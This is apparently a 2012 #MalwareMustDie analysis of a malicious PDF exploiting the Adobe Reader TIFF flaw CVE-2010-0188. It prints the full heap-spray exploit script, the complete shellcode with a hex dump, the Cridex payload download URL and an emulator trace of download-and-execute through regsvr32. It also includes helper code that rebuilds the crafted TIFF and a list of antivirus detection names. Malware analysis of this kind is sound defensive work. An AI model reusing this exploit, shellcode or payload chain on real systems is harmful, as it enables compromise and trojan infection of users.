- app.alert = event.target.creationDate.split('|')[1].replace(/;/g, '');
- var padding;
- var bbb, ccc, ddd, eee, fff, ggg, hhh;
- var pointers_a, i;
- var x = new Array();
- var y = new Array();
- var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/;/g, '');
- var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/;/g, '');
- _l3 = app;
- _l4 = new Array();
- function _l5()
- {
- var _l6 = _l3.viewerVersion.toString();
- _l6 = _l6.replace('.', '');
- while (_l6.length < 4)_l6 += '0';
- return parseInt(_l6, 10)
- }
- function _l7(_l8, _l9)
- {
- while (_l8.length * 2 < _l9)_l8 += _l8;
- return _l8.substring(0, _l9 / 2)
- }
- function _I0(_I1)                    // heap spray
- {
- _I1 = unescape(_I1);                 // %uXXXX escapes -> the payload as a JS string
- roteDak = _I1.length * 2;            // payload size in bytes
- dakRote = unescape('%u9090');        // two NOPs
- spray = _l7(dakRote, 0x2000 - roteDak);   // NOP sled that pads payload + sled to 0x2000 bytes
- loxWhee = _I1 + spray;
- loxWhee = _l7(loxWhee, 524098);      // repeat payload + sled up to ~512 KB per block
- for (i = 0; i < 400; i ++ )_l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;   // 400 blocks, ~200 MB of sprayed heap
- }
- function _I2(_I1, len)
- {
- while (_I1.length < len)_I1 += _I1;
- return _I1.substring(0, len)
- }
- function _I3(_I1)
- {
- ret = '';
- for (i = 0; i < _I1.length; i += 2)
- {
- b = _I1.substr(i, 2);
- c = parseInt(b, 16);
- ret += String.fromCharCode(c);
- }
- return ret
- }
- function _ji1(_I1, _I4)
- {
- _I5 = '';
- for (_I6 = 0; _I6 < _I1.length; _I6 ++ )
- {
- _l9 = _I4.length;
- _I7 = _I1.charCodeAt(_I6);
- _I8 = _I4.charCodeAt(_I6 % _l9);
- _I5 += String.fromCharCode(_I7 ^ _I8);
- }
- return _I5
- }
- function _I9(_I6)
- {
- _j0 = _I6.toString(16);
- _j1 = _j0.length;
- _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
- return _I5
- }
- function _j2(_I1)
- {
- _I5 = '';
- for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
- {
- _I5 += '%u';
- _I5 += _I9(_I1.charCodeAt(_I6 + 1));
- _I5 += _I9(_I1.charCodeAt(_I6))
- }
- return _I5
- }
- function _j3()
- {
- _j4 = _l5();
- if (_j4 < 9000)
- {
- _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
- _j6 = _l1;
- _j7 = _I3(_j6)
- }
- else
- {
- _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
- _j6 = _l2;
- _j7 = _I3(_j6)
- }
- _j8 = 'SUkqADggAABB';
- _j9 = _I2('QUFB', 10984);
- _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
- _ll1 = _j8 + _j9 + _ll0 + _j5;
- _ll2 = _ji1(_j7, '');
- if (_ll2.length % 2)_ll2 += unescape('%00');
- _ll3 = _j2(_ll2);
- with (
- {
- k : _ll3
- }
- )_I0(k);
- ImageField1.rawValue = _ll1
- }
- _j3();
- ====================================
- EXPLOIT IS DETECTED IN....
- =====================================
- // See the "ImageField1.rawValue" assignment near the end of the script:
- // the decoded code builds a TIFF image out of base64 pieces and pushes it into an XFA image
- // field, which is how the LibTIFF TIFF-parsing flaw in Adobe Reader and Acrobat,
- // CVE-2010-0188 (a stack buffer overflow in the handling of the DotRange tag), is reached.
- // The function below is the actual exploit code, commented:
- function _j3()
- {
- _j4 = _l5();                          // app.viewerVersion as an integer, e.g. "9.3" -> 9300
- if (_j4 < 9000)                       // Reader before 9.0: first address set
- {
- _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';   // base64, version-specific pointer data (0x4a80xxxx range)
- _j6 = _l1;                            // hex: pointer table + shellcode
- _j7 = _I3(_j6)                        // hex -> raw string
- }
- else                                  // Reader 9.0 and later: second address set
- {
- _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
- _j6 = _l2;
- _j7 = _I3(_j6)
- }
- _j8 = 'SUkqADggAABB';                 // base64 of the TIFF header: "II*\0" + IFD offset 0x2038
- _j9 = _I2('QUFB', 10984);             // base64 of 8238 'A' padding bytes, so the IFD lands exactly at 0x2038
- _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';   // base64 of the IFD: 7 entries, the last a DotRange (0x0150) with count 0xcc pointing at 0x2092
- _ll1 = _j8 + _j9 + _ll0 + _j5;        // the complete base64 TIFF
- _ll2 = _ji1(_j7, '');                 // "XOR decrypt" with an empty key: ''.charCodeAt(NaN) is NaN and x ^ NaN == x, so this layer is a no-op decoy
- if (_ll2.length % 2)_ll2 += unescape('%00');
- _ll3 = _j2(_ll2);                     // re-pack as %uXXXX escapes (bytes swapped per pair) for unescape()
- with (
- {
- k : _ll3
- }
- )_I0(k);                              // heap spray: 400 blocks of payload + NOP sled
- ImageField1.rawValue = _ll1           // hand the TIFF to the XFA image field -> LibTIFF parses it -> overflow
- // In this case we have a single exploitation only.
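- // Added example (our code, not the sample's): rebuild the TIFF that _j3() assigns to
- // ImageField1.rawValue from the four base64 strings quoted above, and walk its IFD in Node.js
- // to see what the image field actually receives. Only the base64 strings come from the script;
- // the TIFF walker and the DotRange check are ours, and the "two SHORTs" rule is the TIFF
- // definition of that tag.

```javascript
// Added example, not code from the sample: rebuild the exploit TIFF from the base64 pieces
// in _j3() and parse its first IFD. Only the four string constants are the sample's.
const J8 = 'SUkqADggAABB';                      // TIFF header "II*\0" + IFD offset
const J9_UNIT = 'QUFB';                         // base64 of "AAA"
const LL0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
const J5_PRE9 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK'; // the _j4 < 9000 branch

// Same as the script's _I2('QUFB', 10984): repeat until at least len chars, then cut.
function repeatTo(unit, len) {
  let s = unit;
  while (s.length < len) s += s;
  return s.substring(0, len);
}

// _ll1 = _j8 + _j9 + _ll0 + _j5, decoded to bytes.
function buildTiff(j5) {
  return Buffer.from(J8 + repeatTo(J9_UNIT, 10984) + LL0 + j5, 'base64');
}

const TIFF_TYPE_SIZE = { 1: 1, 2: 1, 3: 2, 4: 4, 5: 8 }; // BYTE, ASCII, SHORT, LONG, RATIONAL

// Minimal little-endian TIFF walker: header fields plus the entries of the first IFD.
function parseTiff(buf) {
  if (buf.toString('latin1', 0, 2) !== 'II' || buf.readUInt16LE(2) !== 42) {
    throw new Error('not a little-endian TIFF');
  }
  const ifdOffset = buf.readUInt32LE(4);
  const count = buf.readUInt16LE(ifdOffset);
  const entries = [];
  for (let i = 0; i < count; i++) {
    const at = ifdOffset + 2 + 12 * i;
    const tag = buf.readUInt16LE(at);
    const type = buf.readUInt16LE(at + 2);
    const n = buf.readUInt32LE(at + 4);
    const valueOrOffset = buf.readUInt32LE(at + 8);
    const dataLen = (TIFF_TYPE_SIZE[type] || 0) * n;
    entries.push({
      tag, type, count: n, valueOrOffset, dataLen,
      // data longer than 4 bytes lives out of line: does it even fit in the file?
      truncated: dataLen > 4 && valueOrOffset + dataLen > buf.length,
    });
  }
  return { ifdOffset, count, entries, fileLen: buf.length };
}

// DotRange (tag 0x0150) is defined as exactly two SHORTs. A larger count is the
// CVE-2010-0188 trigger: LibTIFF copied `count` values into a two-element stack array.
function findDotRangeOverflow(parsed) {
  const e = parsed.entries.find((x) => x.tag === 0x0150);
  return e && e.count > 2 ? e : null;
}

const parsed = parseTiff(buildTiff(J5_PRE9));
for (const e of parsed.entries) {
  console.log(`tag=0x${e.tag.toString(16).padStart(4, '0')} type=${e.type} count=${e.count} value/offset=0x${e.valueOrOffset.toString(16)}${e.truncated ? ' (runs past end of file)' : ''}`);
}
```

- // Running it lists seven entries (ImageWidth 0x2030, ImageLength 1, Compression 1, Photometric 1,
- // StripOffsets 8, StripByteCounts 0x2030) and, last, DotRange with count 0xcc = 204 SHORTs at
- // offset 0x2092, where only the 8 trailing bytes of _ll0 plus the 48 bytes of _j5 remain. That
- // oversized count on a two-value tag is the whole exploit; the bytes at 0x2092 are what lands on the stack.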
- ====================================
- SHELLCODE DETECTED IN....
- ; Post-exploitation must be followed by an infection step;
- ; the method used is usually shellcode,
- ; so where is it?
- =====================================
- // See the below code;
- app.alert = event.target.creationDate.split('|')[1].replace(/;/g, '');
- var padding;
- var bbb, ccc, ddd, eee, fff, ggg, hhh;
- var pointers_a, i;
- var x = new Array();
- var y = new Array();
- var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/;/g, '');
- var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/;/g, '');
- // it appends the SECOND array of a, the one we split off earlier (repeated here):
- 6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
- // with the _l1 hex string prepended in front of it:
- // "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"
- // so the full string the exploit turns into bytes is:
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
- // These moronz think they are smart enough to split the binary of the shellcode,
- // but we are smarter.
- // In a hex editor the assembled bytes look like this. Note that the first 68 bytes (0x44,
- // everything up to and including the run of 41 41 .. 'A's) come from _l1 and are pointer and
- // padding data for the exploit, not instructions; the code proper starts at 66 83 e4 fc
- // (and sp,0xfffc / cld) on the fifth row:
- 4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a L.`....J<.`..c.J
- a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41 ...J0..Jn/.JAAAA
- 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
- 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 .9.Jd.`.....AAAA
- 41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 AAAAf......u4._3
- c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 .d.@0.@..p.V.v.3
- db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8 .f.^<.t3,.......
- 8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51 .@0.F9.u..4$..uQ
- e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b ..LQV.u<.t5x..V.
- 76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be v...3.IA....3...
- 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 .8.t......@..;.u
- e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 .^.^$..f..K.F..T
- 24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb $...........^Y..
- 53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68 S..h..}.3t.....h
- 08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00 ...j.Y..........
- 00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50 ..XPj@h....P...P
- 55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 U...^......hon..
- 68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff hurlmT........a.
- ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c .....r.......\$.
- c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7 ..$regs.D$.vr32.
- 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c D$..-s.Sh.....V.
- 8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d ..3.Q.D..wpbt.D.
- 05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88 ..dll.D...Y...0.
- 44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14 D..AQj.j.SWj..V.
- 85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ..u.j.S.V.j....S
- ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa .V........G.?.u.
- 47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe G.?.u.j.j..V....
- ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca ...N.......o..3.
- 8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f .[..Fy6./phttp:/
- 2f 64 65 6c 65 6d 69 61 74 6f 72 2e 72 75 3a 38 /delemiator.ru:8
- 30 38 30 2f 66 6f 72 75 6d 2f 6c 69 6e 6b 73 2f 080/forum/links/
- 63 6f 6c 75 6d 6e 2e 70 68 70 3f 6b 73 63 6e 68 column.php?kscnh
- 63 7a 3d 33 30 3a 31 6e 3a 31 69 3a 31 69 3a 33 cz=30:1n:1i:1i:3
- 33 26 69 73 71 6a 74 3d 32 76 3a 31 6b 3a 31 6d 3&isqjt=2v:1k:1m
- 3a 33 32 3a 33 33 3a 31 6b 3a 31 6b 3a 33 31 3a :32:33:1k:1k:31:
- 31 6a 3a 31 6f 26 68 6d 78 6f 77 78 3d 31 69 26 1j:1o&hmxowx=1i&
- 64 67 61 6d 77 72 78 78 3d 6c 74 66 76 6d 26 78 dgamwrxx=ltfvm&x
- 69 64 75 70 79 3d 6a 6a 6e 71 68 6c 00 00 idupy=jjnqhl..
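- // Added example (our code, not the sample's): take the assembled string apart in Node.js the
- // way the exploit itself does (_I3 hex -> bytes, _j2 bytes -> %u escapes), split it into the
- // _l1 pointer table and the code, and run a "strings" pass over the code. L1_PREFIX is the
- // script's own string; SHELLCODE_TAIL is a constructed excerpt of the second array (its first
- // bytes, the instructions that build "regsvr32 -s" and "wpbt?.dll", and the URL), not the full
- // blob, so the block stays short and runs offline.

```javascript
// Added example, not code from the sample: split _l1 + second array into pointers and code.
const L1_PREFIX = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141';

// Constructed excerpt of the second /CreationDate array (bytes copied from the dump above).
const SHELLCODE_TAIL =
  '6683e4fcfc85e47534e95f33c0648b4030' +                 // and sp,0xfffc / cld / test esp,esp / jnz / ... / mov eax,fs:[eax+0x30]
  'c7042472656773c744240476723332c7442408202d7320' +     // mov [esp],'regs' ; mov [esp+4],'vr32' ; mov [esp+8],' -s '
  'c7441d0077706274c7441d052e646c6cc6441d0900' +         // mov [ebp+ebx],'wpbt' ; mov [ebp+ebx+5],'.dll' ; mov byte [ebp+ebx+9],0
  Buffer.from('http://delemiator.ru:8080/forum/links/column.php', 'latin1').toString('hex') +
  '0000';                                                // NUL-terminated, as in the dump

// Same job as the script's _I3(): hex text -> raw bytes.
function hexToBytes(hex) {
  return Buffer.from(hex, 'hex');
}

// Same job as the script's _j2(): pack byte pairs as %uXXXX with the two bytes swapped,
// so that unescape() inside Reader lays them back down in the original order.
function toUnicodeEscapes(bytes) {
  let s = '';
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    s += '%u' + bytes[i + 1].toString(16).padStart(2, '0') + bytes[i].toString(16).padStart(2, '0');
  }
  return s;
}

// The _l1 part is a table of little-endian dwords (addresses and padding); the rest is x86 code.
function splitPayload(prefixHex, tailHex) {
  const prefix = hexToBytes(prefixHex);
  const pointers = [];
  for (let i = 0; i + 3 < prefix.length; i += 4) pointers.push(prefix.readUInt32LE(i));
  return { pointers, code: hexToBytes(tailHex) };
}

// "strings"-style pass. minLen 4 keeps the 4-byte immediates the shellcode uses to build its
// strings on the stack; a longer minimum leaves only the URL.
function printableStrings(bytes, minLen = 4) {
  const out = [];
  let run = '';
  for (const b of bytes) {
    if (b >= 0x20 && b < 0x7f) {
      run += String.fromCharCode(b);
    } else {
      if (run.length >= minLen) out.push(run);
      run = '';
    }
  }
  if (run.length >= minLen) out.push(run);
  return out;
}

const { pointers, code } = splitPayload(L1_PREFIX, SHELLCODE_TAIL);
console.log(pointers.map((p) => '0x' + p.toString(16).padStart(8, '0')).join(' '));
console.log(printableStrings(code));
```

- // The pointer table prints as 0x0f60204c 0x4a801705 0x0f60203c 0x4a80630f 0x4a80eba3 ..., which is
- // what to compare against the DotRange data in the TIFF and against the loaded modules of the
- // Reader version being targeted. The strings pass only finds the URL as a whole; "regs", "vr32",
- // " -s ", "wpbt" and ".dll" show up as 4-byte fragments because the shellcode assembles them
- // with mov immediates, so do not expect "regsvr32" or "wpbt0.dll" to appear literally in the bytes.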
- ================================
- DOWNLOAD URL OF PAYLOAD
- AND INFECTION METHOD....
- ================================
- // The URL the shellcode downloads its payload from, which leads us to Cridex,
- // is written in plain text inside the shellcode, as below:
- ----------------------------------------
- h00p://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl
- ----------------------------------------
- //↑ here it is, the URL this SOB tried to hide..
- // The infection is carried out through the Windows API, using kernel32.dll, urlmon.dll and
- // regsvr32.exe. The shellcode finds kernel32 by walking the PEB loader list (xor eax,eax /
- // mov eax,fs:[eax+0x30] / mov eax,[eax+0xc] / mov esi,[eax+0x1c] is visible at the start of the
- // code) and resolves its imports by export-name hash (the ror 0xd at c1 cb 0d).
- // Running it in a shellcode emulator gives the following API trace:
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- // It unprotects its own memory (VirtualProtect), loads urlmon.dll, downloads the Cridex trojan
- // into %TEMP% as wpbt0.dll, runs it with WinExec, and then runs "regsvr32 -s" on it, which
- // loads the DLL and calls its DllRegisterServer export (so the DLL's code runs even if the
- // direct WinExec did nothing). Two caveats: the digit in wpbt0.dll is computed from a counter
- // (pop ecx / mov al,cl / add al,0x30 in the dump), so don't key a detection to that exact name;
- // and the 0x7c80xxxx kernel32 addresses in the trace belong to the emulator's XP-style address space.
- ================================================
- CURRENT DETECTION OF ANTIVIRUS IS ??
- ================================================
- // Detection is "not bad": a VT score of 20 / 44.
- //
- // But you would not know from the names what exploit hit you, because most of them
- // are generic ("not so comprehensive") labels..
- // We saw that only F-Secure names the actual vulnerability.
- F-Secure : Exploit:W32/CVE-2010-0188.B
- DrWeb : Exploit.PDF.3096
- Microsoft : Exploit:Win32/Pdfjsc.AEB
- VIPRE : LooksLike.PDF.Malware.c (v)
- AntiVir : EXP/Pdfjsc.aeb
- TrendMicro : TROJ_PIDIEF.SMWY
- McAfee-GW-Edition : Exploit-PDF!Blacole.o
- TrendMicro-HouseCall : TROJ_GEN.F47V1125
- MicroWorld-eScan : Exploit.TIFF.Gen
- Avast : JS:Pdfka-gen [Expl]
- nProtect : Exploit.TIFF.Gen
- GData : Exploit.TIFF.Gen
- Kaspersky : HEUR:Exploit.Script.Generic
- BitDefender : Exploit.TIFF.Gen
- McAfee : Exploit-PDF!Blacole.o
- ESET-NOD32 : JS/Exploit.Pdfka.PWF
- Ikarus : Exploit.PDF
- AVG : Exploit_c.VVV
- Sophos : Troj/PDFJs-AAS
- Comodo : TestSignature.JS.Pdfka.FBQ
- // .. We swore,
- // .. the sweat, tears & blood of a crusader in act, is like a martyr.. one died & shall be replaced by 10 more..
- // .. bless & glory to those who stick to fight for the truth 'till the end..
- // .. shall we be mocked or broken in fighting, the curse is upon you, malware moronz! By the name of God.
- // .. with a curse that shall last forever, a curse for those enemies of God..
- // ..
- // .. Yet, it is not too late to stop your evil works. Ask for forgiveness and stop your act.
- // ..
- ---
- #MalwareMustDie
- @unixfreaxjp /malware]$ date
- Mon Nov 26 21:12:33 JST 2012